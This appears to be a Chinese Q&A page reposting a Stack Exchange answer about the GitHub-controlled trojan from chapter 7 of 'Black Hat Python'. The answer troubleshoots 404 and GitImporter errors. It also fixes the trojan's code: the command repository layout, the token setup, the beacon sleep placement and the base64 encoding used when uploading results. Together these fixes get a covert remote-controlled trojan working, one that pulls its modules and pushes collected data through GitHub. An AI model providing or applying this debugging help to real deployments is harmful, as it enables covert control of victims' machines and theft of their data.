You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

《Python黑帽子》第7章编写木马触发github3 404及GitImporter报错求解

问题原因与解决方案

核心404错误排查

  • 首先检查你的GitHub仓库bhptrojan的目录结构是否完整,必须包含以下内容:
    • /config/abc.json:对应你初始化Trojan时传入的idabc,配置文件里要指定要加载的模块,确保模块名和你modules目录下的文件名完全一致
    • /modules/dirlister.py、/modules/environment.py:报错信息显示脚本正在尝试拉取这两个模块,你必须提前把这两个模块文件上传到对应目录
    • /data/abc/:可选,脚本运行时会自动创建数据存储目录
  • 检查你的GitHub token权限:mytoken.txt中的个人访问令牌必须开启repo权限,才能读取私有仓库的文件,如果仓库是公开的可以不用,但私有仓库必须配置正确。
  • 检查仓库名和用户名是否正确:代码里github_connect函数写死了用户名是Sebthelad,仓库名是bhptrojan,确保和你实际的GitHub用户名、仓库名完全一致,拼写错误也会导致404。

AttributeError问题说明

那个'GitImporter' object has no attribute 'find_spec'错误是Python3导入系统的兼容问题,Python3.4之后优先调用find_spec方法,你的GitImporter类只实现了Python2时期的find_module方法,导入系统会先尝试调用find_spec失败后自动降级到find_module,不会影响功能,如果你要消除这个报错,可以在GitImporter类里加个空的find_spec方法:

def find_spec(self, name, path, target=None):
    return None

其他代码bug修复

  • 修复run方法的sleep位置错误:你现在把time.sleep(random.randint(30*60, 3*60*60))写在了while True循环外面,永远不会执行,会导致木马无限高频拉取配置,需要把这行缩进,放到while块的末尾:
def run(self):
    while True:
        config = self.get_config()
        for task in config:
            thread = threading.Thread(target=self.module_runner,args=(task['module'],))
            thread.start()
            time.sleep(random.randint(1,10))
        # 缩进移到这里
        time.sleep(random.randint(30*60, 3*60*60)) 
  • 修复store_module_result的编码错误:你现在调用的是base64.b64decode(bindata),应该改为base64.b64encode(bindata),否则会因为二进制数据不符合base64格式报错。
  • 增加异常捕获:可以在get_file_contents函数里加异常捕获,避免文件不存在时直接崩溃:
def get_file_contents(dirname, module_name, repo):
    try:
        return repo.file_contents(f'{dirname}/{module_name}').content
    except github3.exceptions.NotFoundError:
        print(f"[!] 文件{dirname}/{module_name}不存在")
        return None

内容的提问来源于stack exchange,提问作者SebstaBro7

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.10.01 04:24:00